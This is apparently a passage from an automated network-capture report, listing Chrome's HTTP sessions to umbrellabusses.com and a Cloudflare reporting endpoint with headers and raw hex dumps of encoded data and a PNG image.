                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 54 77 39 41 55 30 52 54 45 32 6c 4d 75 7a 31 73 57 6d 78 73 67 65 4f 33 37 66 55 68 4a 63 63 55 43 49 75 59 59 73 64 4d 42 54 43 6c 69 68 77 65 46 4f 42 78 57 43 36 45 4f 47 68 68 4a 7a 2f 51 57 36 32 36 44 32 38 2b 30 4a 5a 4e 48 67 2f 4a 6c 79 77 37 4d 6c 35 44 68 50 6d 77 4d 65 55 6b 77 72 36 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a 32 52 76 5a 4b 52 66 5a 6f 73 6e 50 6b 73 6a 5a 6e 34 43 6a 66 43 2f 49 70 6f 53 51 50 69 53 78 72 5a 72 78 71 4a 69 38 34 63 6f 32 43 30 39 6e 32 61 79 42 6f 50 6e 4c 74 67 78 34 77 48 79 53 46 75 37 45 4d 38 61 6c 67 74
                                                                                                                                                                                                                        Data Ascii: Tw9AU0RTE2lMuz1sWmxsgeO37fUhJccUCIuYYsdMBTClihweFOBxWC6EOGhhJz/QW626D28+0JZNHg/Jlyw7Ml5DhPmwMeUkwr6360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algt
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 61 70 67 36 33 35 61 67 56 2f 54 72 65 59 59 49 36 70 47 37 34 48 39 68 38 2f 50 45 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c 35 63 58 42 32 43 6f 48 56 50 2b 54 6e 72 4f 63 72 5a 2b 59 33 58 36 71 50 65 48 38 4e 65 74 4c 4e 53 4b 71 43 78 75 70 5a 51 71 34 36 50 62 6e 5a 5a 72 43 53 2f 71 67 61 45 56 2b 46 31 76 72 76 6f 35 43 48 37 65 74 6f 70 4e 6d 4b 46 67 41 66 2b 2f 69 73 47 6f 39 77 66 51 42 45 42 6a 79 41 6e 34 74 58 30 31 71 75 74 71 34 4c 4f 32 63 7a 65 2b 41 6c 2f 74 57 52 43 4c 63 36 52 4e 68 78 7a 57 35 76 4e 66 71 33 37 73 4f 70 7a 2f 49 48 70 52 2b 6f 59 72 4a 7a 34 4f 56 4b 6e 48 76 6c 32 72 61 65 32 6b 33 4f 77 6c 49 6d 4e 68 65 57 61 33 44 55 62 39 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49
                                                                                                                                                                                                                        Data Ascii: apg635agV/TreYYI6pG74H9h8/PENGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl2rae2k3OwlImNheWa3DUb9IQAxAHYCuDip7awn502joqcI
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 55 43 44 6b 4b 72 48 67 4a 43 44 48 4b 6b 67 51 44 57 41 4c 6a 47 46 73 58 74 63 4c 51 50 54 71 55 4e 45 47 69 32 56 52 4c 37 72 7a 2b 7a 59 6b 4f 54 34 42 71 76 48 37 76 2f 52 31 55 31 4a 37 78 59 51 75 75 39 63 74 65 64 79 2b 74 2b 4e 52 30 66 4d 36 50 5a 71 37 39 63 53 45 76 38 55 6d 4b 73 55 53 45 4c 6c 31 72 49 43 33 47 4e 41 59 77 33 47 50 57 2f 35 2f 30 6e 59 76 37 74 36 31 30 4d 75 47 34 76 74 50 6e 67 6a 52 75 76 49 43 48 6c 4b 2f 68 34 4a 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78 47 59 39 70 32 42 4e 46 66 63 6a 31 45 61 72 53 71 32 61 4b 4d 72
                                                                                                                                                                                                                        Data Ascii: UCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+t+NR0fM6PZq79cSEv8UmKsUSELl1rIC3GNAYw3GPW/5/0nYv7t610MuG4vtPngjRuvICHlK/h4JePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMr
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 49 75 34 76 4c 2f 69 57 4f 4b 77 50 41 52 58 74 47 71 64 6d 35 6e 64 36 4d 75 58 55 61 6b 76 54 77 31 72 6e 45 7a 67 49 49 6b 69 54 70 49 57 6e 64 49 47 2f 31 47 4f 6f 61 46 67 78 76 6a 53 33 56 42 68 48 41 52 42 59 56 36 38 6c 66 6b 35 6b 4f 4f 36 4e 64 41 4a 41 59 36 37 54 75 6a 47 45 59 5a 75 37 36 43 4f 7a 42 4c 69 4f 56 52 6f 50 4b 39 53 76 34 65 76 30 35 64 65 47 49 4d 70 75 58 62 37 6b 64 2f 6c 36 64 59 48 2f 39 39 36 71 53 65 2f 2f 64 47 47 4c 31 46 51 31 47 2f 58 51 41 73 5a 41 56 51 65 78 57 2b 6d 45 41 56 44 79 33 74 37 53 50 72 73 58 49 67 59 76 6e 30 38 67 46 79 2b 43 72 2b 78 35 63 67 61 49 62 48 49 33 41 46 63 73 65 61 47 67 72 35 49 72 6f 41 4c 43 51 4c 59 36 7a 57 62 72 4f 46 73 56 79 57 44 7a 34 57 4d 68 50 64 41 44 77 50 33 58 2f 32 69
                                                                                                                                                                                                                        Data Ascii: Iu4vL/iWOKwPARXtGqdm5nd6MuXUakvTw1rnEzgIIkiTpIWndIG/1GOoaFgxvjS3VBhHARBYV68lfk5kOO6NdAJAY67TujGEYZu76COzBLiOVRoPK9Sv4ev05deGIMpuXb7kd/l6dYH/996qSe//dGGL1FQ1G/XQAsZAVQexW+mEAVDy3t7SPrsXIgYvn08gFy+Cr+x5cgaIbHI3AFcseaGgr5IroALCQLY6zWbrOFsVyWDz4WMhPdADwP3X/2i
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 59 2b 50 68 74 30 41 55 59 4c 36 54 56 71 57 45 6c 2b 59 49 43 4b 6d 48 37 36 55 6b 77 45 2b 72 4a 4a 7a 68 42 6f 42 2f 54 4d 43 75 77 61 69 76 61 6a 44 71 76 77 65 77 46 6e 4b 67 70 32 49 45 6e 74 76 59 73 6b 4b 70 6b 41 2f 37 7a 56 73 62 76 4f 58 59 7a 39 42 70 46 6f 47 6f 56 42 48 6d 56 31 43 5a 65 78 36 62 63 74 38 42 6a 34 6b 46 7a 6b 57 7a 52 58 48 46 66 6b 31 63 4a 65 44 33 48 66 4a 70 6b 42 4f 41 48 49 74 35 38 73 59 4c 53 39 38 37 31 6a 2f 32 42 51 5a 32 75 61 67 4c 65 65 4b 61 31 77 6b 71 65 32 72 47 73 65 30 66 6a 31 30 2f 38 34 4d 41 74 61 34 62 4f 52 36 2f 30 68 46 45 78 72 79 30 48 79 57 61 55 47 36 6c 53 38 33 68 49 6f 41 44 39 75 77 73 6f 76 6a 63 75 61 46 6a 66 47 43 78 78 49 43 41 76 41 56 34 73 6b 70 53 64 51 41 49 30 47 6b 6d 55 39 66
                                                                                                                                                                                                                        Data Ascii: Y+Pht0AUYL6TVqWEl+YICKmH76UkwE+rJJzhBoB/TMCuwaivajDqvwewFnKgp2IEntvYskKpkA/7zVsbvOXYz9BpFoGoVBHmV1CZex6bct8Bj4kFzkWzRXHFfk1cJeD3HfJpkBOAHIt58sYLS9871j/2BQZ2uagLeeKa1wkqe2rGse0fj10/84MAta4bOR6/0hFExry0HyWaUG6lS83hIoAD9uwsovjcuaFjfGCxxICAvAV4skpSdQAI0GkmU9f
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 54 64 76 50 36 38 55 6a 6f 50 75 36 52 4a 2b 45 78 48 65 66 41 43 49 6e 72 4e 7a 65 51 36 41 39 61 37 70 36 68 4d 41 77 30 59 6f 4b 4a 4b 61 68 34 6b 42 42 79 53 4a 79 51 76 4d 74 61 6f 30 42 4b 41 6b 2f 6d 38 54 6d 37 37 37 73 51 66 75 47 6f 7a 36 51 5a 44 7a 2f 68 78 4b 4b 69 61 69 69 79 57 38 64 4f 33 47 74 35 6e 5a 69 30 59 4d 48 41 6c 2f 37 37 33 67 75 46 44 37 56 77 49 67 66 4d 4d 2b 6a 5a 31 43 48 34 52 2b 42 54 6c 42 75 6a 43 32 41 79 68 79 44 64 74 52 58 46 30 31 5a 77 75 4b 57 4c 65 78 53 6c 4b 48 6e 30 38 76 58 48 52 36 77 49 35 50 77 62 42 55 61 59 4d 43 78 33 30 51 4d 72 37 44 79 53 39 4f 78 41 62 34 61 37 33 61 36 51 54 56 61 43 6a 63 38 63 6c 44 44 57 41 73 67 4b 30 47 6f 37 36 6d 41 39 65 35 67 68 32 41 58 63 56 4a 2f 6f 2f 6b 2b 35 33 78
                                                                                                                                                                                                                        Data Ascii: TdvP68UjoPu6RJ+ExHefACInrNzeQ6A9a7p6hMAw0YoKJKah4kBBySJyQvMtao0BKAk/m8Tm777sQfuGoz6QZDz/hxKKiaiiyW8dO3Gt5nZi0YMHAl/773guFD7VwIgfMM+jZ1CH4R+BTlBujC2AyhyDdtRXF01ZwuKWLexSlKHn08vXHR6wI5PwbBUaYMCx30QMr7DyS9OxAb4a73a6QTVaCjc8clDDWAsgK0Go76mA9e5gh2AXcVJ/o/k+53x


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        83192.168.2.55000535.190.80.14435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC488OUTPOST /report/v4?s=h%2BCxDTqcl9%2Bp1xH1t8iXLJONVqNNYhgZvv%2F%2FqBy4dfDikrLNjYBlHsEkALCauQSUchQFAL2B%2Fj35ai1J0OblAiseg9x5rGB6DnIptADkQpxJHw5CLhsGWjjF%2BAk5rXtzqqkW3kM%3D HTTP/1.1
                                                                                                                                                                                                                        Host: a.nel.cloudflare.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 442
                                                                                                                                                                                                                        Content-Type: application/reports+json
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC442OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 34 33 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 75 6d 62 72 65 6c 6c 61 62 75 73 73 65 73 2e 63 6f 6d 2f 73 61 6d 68 65 6e 74 69 72 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                                                                                                                                                                                                        Data Ascii: [{"age":1,"body":{"elapsed_time":1435,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://umbrellabusses.com/samhentir/css/main.css","sampling_fraction":1.0,"server_ip":"","status_code":0,"type":"abandoned"},"type":"network-erro
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:53:07 GMT
                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        84192.168.2.550009104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC362OUTGET /samhentir/img/pf.png HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1001INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:07 GMT
                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:19:32 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef384-1757b"
                                                                                                                                                                                                                        Expires: Thu, 06 Feb 2025 10:58:04 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 269703
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fl4MQ3fX2%2Fxjv8sVKOzXS%2FzDzPoGOPz1q9oaGMyxzWM7YxySSehnUAeH%2ByKibucllt3z1HCs2BV6GzOS2K%2FlU%2Fjjjs9PzHQGNHvyh6SIVYNmHckYcmICh7LthMZBR2kCTMboOtg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26c61f358cbf-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1815&rtt_var=693&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=940&delivery_rate=1566523&cwnd=249&unsent_bytes=0&cid=3430d0b4558ec711&ts=157&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC368INData Raw: 37 63 38 63 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 96 00 00 02 11 08 06 00 00 00 69 a5 9b 6b 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec bd 07 98 25 55 9d 36 fe 9e 73 2a dc ba a1 c3 f4 44 d2 c0 c0 62 06 03 22 49 10 45 d1 11 c1 38 06 94 20 ae e8 ae ba fa 3d fb d7 6f 83 bb ee ae 6e 34 a3 80 c8 aa eb ea e7 9a 11 44 04 94 91 cc c2 90 83 30 4c 0e 3d dd d3 e1 f6 8d 95 ab fe cf ef d4 ad ee db c3 74 f7 4c 87 e9 db 7d 4f 3d 33 4f a7 0a a7 de 73 aa de fb 4b ef 8f 41 6d 0a 01 85 80 42 40 21 a0 10 98 45 04 d8 2c 9e 4b 9d 4a 21 a0 10 50 08 28 04 14 02 50 c4 a2 16 81 42 40 21 a0 10 50 08 cc 2a 02 8a 58 66 15 4e 75 32 85 80 42 40 21 a0 10 50 c4 a2 d6 80 42 40 21 a0 10 50 08 cc 2a 02 8a 58 66 15 4e 75 32 85 80 42 40 21
                                                                                                                                                                                                                        Data Ascii: 7c8cPNGIHDRiksRGB IDATx^%U6s*Db"IE8 =on4D0L=tL}O=3OsKAmB@!E,KJ!P(PB@!P*XfNu2B@!PB@!P*XfNu2B@!
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: f4 5a 86 31 24 bf 1f 1a 32 e4 57 c3 48 be 36 6f 9e e7 c5 93 4d cf fe 8e d1 75 7d d6 ef 07 18 92 c3 f0 fd 8e 49 c7 33 d9 58 a7 ba 97 43 bd 0c 67 73 3c ab 0e f5 e0 17 d1 f5 86 f6 b3 ee f7 bd bd 95 8d 5f 0c 1f c0 be fb 1e 3b d5 f3 e0 fb fe b4 d7 34 5d 6b df f3 6b 9a 26 9f 3f 4d ab 30 a0 fb 39 33 15 04 41 4c ff 33 99 4c b8 77 ef de f0 4d 6f 7a 93 cf 18 93 ef 07 b5 2d 2e 04 66 f4 22 8e e3 98 dd 7b ef bd dd 8c b1 0e 4d 8b bb 0d 2e ba 9d 20 ec cc e8 7a 81 69 3c 13 07 71 46 d3 78 17 18 33 e3 18 1a e3 4c 63 8c 89 18 b1 60 4c 08 c6 62 0e 80 33 c6 46 c7 11 c7 71 8c 28 8a e3 64 c1 d1 0e 71 2c ff 21 06 4b 24 68 18 e4 1f e9 7b 79 42 fa ca 92 5f b3 08 11 63 51 e3 7c f2 37 63 b7 38 ee 87 c6 3c 46 8c 8f c3 80 0e 1e 37 c5 13 2c fb 18 48 1f ca e4 2b 8d 3b dd 38 1f fd 3e 8e
                                                                                                                                                                                                                        Data Ascii: Z1$2WH6oMu}I3XCgs<_;4]kk&?M093AL3LwMoz-.f"{M. zi<qFx3Lc`Lb3Fq(dq,!K$h{yB_cQ|7c8<F7,H+;8>
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 53 d7 61 59 16 86 87 46 ec 42 47 61 c3 d6 2d db bf ec 17 eb b7 9f 77 e1 85 8a 5c 66 05 f9 b9 3d c9 a4 c4 42 6e 30 43 44 eb d6 1c b3 e6 f3 b5 7a e5 68 ca c9 27 57 18 15 3f 79 61 90 b8 c2 a6 28 30 9c db e1 ab b3 2b 04 14 02 0b 19 01 23 a3 cb a0 3d 91 08 b9 c0 4c dd 48 8a 2b 1b ee f6 42 be 93 08 c7 66 c0 c3 c5 a1 91 2f 7b 70 d6 bf f1 8d eb 86 17 f2 3d b7 c3 d8 27 25 16 2a 86 5c da 55 f8 6c 3e 9f fd 90 a6 8b 2e 49 22 8d ec e2 a4 18 8a b6 a9 44 3d da 01 46 75 8f 0a 01 85 c0 74 10 08 e3 40 ba c2 28 ce 42 ee 75 92 a8 09 c3 10 54 f0 2f 09 26 8c e5 df 03 cf af d7 6a ce e3 c5 81 bd 5f 0d b4 f8 16 45 2e d3 41 fb d0 1d 33 85 c5 b2 7e 69 4f d7 ca 2b b2 d9 cc db 85 10 86 94 f1 62 91 9c f0 28 0a 1a b2 0d 8a 58 0e dd 74 a9 2b 29 04 16 17 02 53 11 4b e0 fa 24 52 2b 2d 19
                                                                                                                                                                                                                        Data Ascii: SaYFBGa-w\f=Bn0CDzh'W?ya(0+#=LH+Bf/{p='%*\Ul>.I"D=Fut@(BuT/&j_E.A3~iO+b(Xt+)SK$R+-
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: c8 65 ee 57 d8 54 c4 f2 81 7c 21 f7 cf 9c b1 1e 6a 21 4a 1b a5 1b d3 46 e9 c6 b4 a9 3a 96 b9 9f 24 75 05 85 c0 e2 44 60 e6 c4 32 31 2e c9 0b 8a 41 24 85 95 51 34 58 a9 54 6f dd b1 7b f7 55 d5 6a f0 c0 a5 97 5e ea 2c 4e 4c 5b e3 ae 26 25 96 55 4b 3b 2f ca e5 0b 5f 50 c4 d2 1a 93 a5 46 a1 10 58 5c 08 cc 3d b1 50 75 3e 59 33 64 c5 54 ab d5 c1 7a bd 7e d3 de a1 a1 ab c4 d6 be 87 d6 7e e2 13 ee e2 c2 b3 75 ee 46 11 4b eb cc 85 1a 89 42 a0 cd 10 98 39 b1 ec eb 31 49 3d 29 29 90 94 7e 1c 04 81 d4 35 a4 3a 97 52 a9 34 a0 e9 da 6f 37 3d bd e9 8a 90 e7 1e 5d b7 6e 9d d7 66 a0 1f 92 db 9d 8a 58 2e ce e5 0b 9f 57 16 cb 21 99 0b 75 11 85 40 9b 21 30 fb c4 d2 ec a6 6f 38 eb 65 ac 85 24 f7 73 b9 9c fc 55 a5 52 19 08 3c ff 86 8d cf 3c 7b 8d c8 74 3f ac c8 65 f6 97 dd 84
                                                                                                                                                                                                                        Data Ascii: eWT|!j!JF:$uD`21.A$Q4XTo{Uj^,NL[&%UK;/_PFX\=Pu>Y3dTz~~uFKB91I=))~5:R4o7=]nfX.W!u@!0o8e$sUR<<{t?e
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 45 2c 0b f1 a1 55 63 56 08 b4 3a 02 ad 41 2c 53 f5 73 49 0a 28 f5 d1 7e 2e 24 c3 4f 44 33 32 52 da ed 39 fe 2f b6 6e de 76 f5 ba f7 7f f0 a9 56 47 fb 50 8e 6f 72 62 59 b1 ec 63 d9 5c e6 af 14 b1 1c ca 29 51 d7 52 08 b4 0b 02 f3 4f 2c 07 db cf 85 74 c5 c8 72 d1 18 97 fd 5c 86 07 47 76 72 2e 7e b4 75 e7 ee ef bd ed 6d ef 7e 9a b1 7d a3 36 ed 32 97 e3 ef 73 52 62 39 6a c5 b2 8f 5b 39 eb af 18 63 79 e5 0a 6b cf 05 b2 d8 ef ba d9 9f 3e d9 2b 81 c7 00 d5 3c cc d6 46 e7 a3 6d 36 cf 39 5b 63 3b 74 e7 99 7f 62 39 90 7e 2e a9 c5 42 84 42 f1 16 d9 db c5 f5 1a fd 5c 2c 0c 0e 15 77 d6 eb f6 cf 87 07 86 ae 75 22 ed 69 15 73 01 26 27 96 c3 96 7f c2 ca 64 fe af 22 96 43 f7 a8 a9 2b 1d 1c 02 e9 0b 7a df a3 26 7a 61 8f 0f cc 52 a0 76 2c a9 87 88 85 c5 49 17 75 de f8 9a 9e
                                                                                                                                                                                                                        Data Ascii: E,UcV:A,SsI(~.$OD32R9/nvVGPorbYc\)QRO,tr\Gvr.~um~}62sRb9j[9cyk>+<Fm69[c;tb9~.BB\,wu"is&'d"C+z&zaRv,Iu
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 17 be 2b 6c aa ca fd fd f4 73 e9 d3 b8 b8 61 f3 b3 db bf d9 bd e2 88 45 eb 16 9b 8a 58 a8 f2 fe af 94 c5 d2 c6 cf fe 02 bf f5 fd 11 cb a8 b5 41 81 fb 28 82 a1 69 d0 88 2c fc 00 8c 04 06 c1 a0 51 16 69 1c 82 85 11 b8 e0 80 d0 12 b3 23 06 e2 28 94 14 11 c5 31 f4 8c 85 ba e7 c3 a1 b4 53 c3 40 64 68 f0 93 56 b6 d2 aa 49 eb 5c d2 2c 32 49 42 14 d0 8f a9 f2 7e 81 83 3b e3 e1 2f 3e 62 49 e6 b7 19 98 fd f5 73 a9 f6 07 7e f0 cb 4d 1b b7 7e bb 54 f7 1f 5f 8c 6e b1 03 21 16 b2 58 72 2a c6 32 e3 a7 48 9d 60 0e 10 d8 57 93 6b df 4f 90 f4 72 97 2e a9 7d 2d 15 fa 3d 8b c0 10 22 f2 3d 84 b6 0d 11 44 e8 10 06 74 cd 00 5c 1f b0 6d 54 77 f5 a2 3a 52 44 7f ef 5e 8c 14 87 10 83 63 d9 f2 1e ac 3e ea 18 e4 0f 5b 01 74 77 03 d9 0c 02 16 a1 ea fb f0 74 06 91 cd 22 e6 5c ca ac 6b
                                                                                                                                                                                                                        Data Ascii: +lsaEXA(i,Qi#(1S@dhVI\,2IB~;/>bIs~M~T_n!Xr*2H`WkOr.}-="=Dt\mTw:RD^c>[twt"\k
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 75 66 7e 9d 43 7b 06 45 2c 87 16 6f 75 b5 59 44 40 be e8 65 3d 48 e2 c2 92 c1 79 b2 5a 1a 56 06 5d 8a aa e0 7b 72 1d e0 c3 25 3c 72 d3 2d 78 f6 b6 db b1 d2 b4 10 97 cb e8 b0 4c b8 be 23 2b ee 89 5c 24 11 35 ac 92 b4 8f 3d b9 bc d2 cc 9f 66 8d 2f 22 16 da a7 16 f9 52 1b 4c f3 81 ae ce 25 e8 af d7 50 33 75 94 4c 03 a7 bf f5 cd 38 f2 c4 97 00 1d 39 54 00 94 03 0f c2 d4 01 4a 41 f6 43 e8 5c c8 4c b3 f6 dd 94 c5 12 c7 a1 8c b1 50 3f 17 b2 5c b2 d9 1c 11 0b 18 c4 40 b5 6a df da d7 bb e7 0a 27 e4 8f ae 5b b7 ce 5e 48 eb 44 11 cb 42 9a 2d 35 d6 71 08 a4 c4 42 d6 85 b4 58 a4 8b 2a 92 55 f3 32 ca 42 ae ad 38 82 15 c6 60 fd 83 f8 e9 57 af c4 91 10 f0 fb fb b1 b4 a3 80 5a bd 02 61 8c a9 0b 93 53 8a ce 45 16 0b 6d d2 62 89 92 38 0b 7d 9f 66 74 d1 df a4 7b 8c 47 70 59
                                                                                                                                                                                                                        Data Ascii: uf~C{E,ouYD@e=HyZV]{r%<r-xL#+\$5=f/"RL%P3uL89TJAC\LP?\@j'[^HDB-5qBX*U2B8`WZaSEmb8}ft{GpY
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: c4 0e 04 38 ff e3 97 83 1f 73 18 6a 59 13 b6 8c eb 30 88 74 bf 59 41 63 a1 9d 44 11 4b f3 87 8a fd e7 71 24 96 9b e3 38 32 c8 4f 12 30 b5 5a ad 18 04 c1 ad cf 3e bb f5 9a 8e 25 fc be 73 cf 6d 3d b7 98 22 96 85 f6 2c aa f1 8e 43 80 88 25 9b cd a2 56 b5 a5 54 3d a8 93 a3 e7 61 09 13 30 ca 55 dc 79 f5 7f c1 dd b2 1d dd 0c f0 ec 1a 84 49 ae 16 1f 06 37 10 78 0e 34 0a be eb d4 9c 8b 0e 0b 60 70 13 56 be 80 10 0c 25 cf 46 31 72 71 c4 d1 ab 51 2d 8f c0 af d5 90 27 32 a0 5e f6 82 c3 a9 db d0 75 73 9c 90 24 05 f5 69 23 97 9a 24 17 92 ea 40 84 41 53 c3 09 6f 7e 3d 8e 39 eb 74 94 4d 0d 9e 26 e0 33 f2 c2 8d a5 3b b7 df d4 2a 62 99 4a 6b 4c 26 a6 c4 31 0c a1 49 b7 6d ce ca 26 75 2e 8c 15 eb 35 7b 7d ef 9e a1 2b 8a 15 fb 81 8b 5a 2c e6 a2 88 a5 fd 9e e6 45 74 c7 54 bb
                                                                                                                                                                                                                        Data Ascii: 8sjY0tYAcDKq$82O0Z>%sm=",C%VT=a0UyI7x4`pV%F1rqQ-'2^us$i#$@ASo~=9tM&3;*bJkL&1Im&u.5{}+Z,EtT
